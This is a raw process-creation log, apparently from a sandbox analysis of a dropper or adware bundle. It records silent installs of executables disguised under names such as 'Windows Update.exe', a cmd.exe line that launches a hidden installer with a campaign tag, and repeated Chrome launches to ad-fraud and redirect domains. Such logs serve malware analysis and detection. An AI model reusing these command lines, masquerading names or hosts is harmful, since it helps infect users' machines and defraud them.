Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe Process created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp "C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp" /SL5="$50038,5808768,66560,C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: unknown Process created: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe "C:\Program Files (x86)\windows multimedia platform\ZHunuhebaqu.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Process created: C:\Program Files (x86)\i-record\I-Record.exe "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,9627623661114225042,16842326924946872670,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,16917623383291386263,6472938917553362493,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1856 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,6457543823163007411,15253291914772866949,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1728 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10546296038144766013,8885457530477492480,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1852 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,5678826982049071516,1403594556980502964,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1860 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654" & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe "C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe" /S /UID=rec7 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (2 consecutive identical entries collapsed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,9627623661114225042,16842326924946872670,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (42 consecutive identical entries collapsed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (7 consecutive identical entries collapsed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654" & exit
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (33 consecutive identical entries collapsed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,16917623383291386263,6472938917553362493,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1856 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (2 consecutive identical entries collapsed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,6457543823163007411,15253291914772866949,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1728 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (2 consecutive identical entries collapsed)
